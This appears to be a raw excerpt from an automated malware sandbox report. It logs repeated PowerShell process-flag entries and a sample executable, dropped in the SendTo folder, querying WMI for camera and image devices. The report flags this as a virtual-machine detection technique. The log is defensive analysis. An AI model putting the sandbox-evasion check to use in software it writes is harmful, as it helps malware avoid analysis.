                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
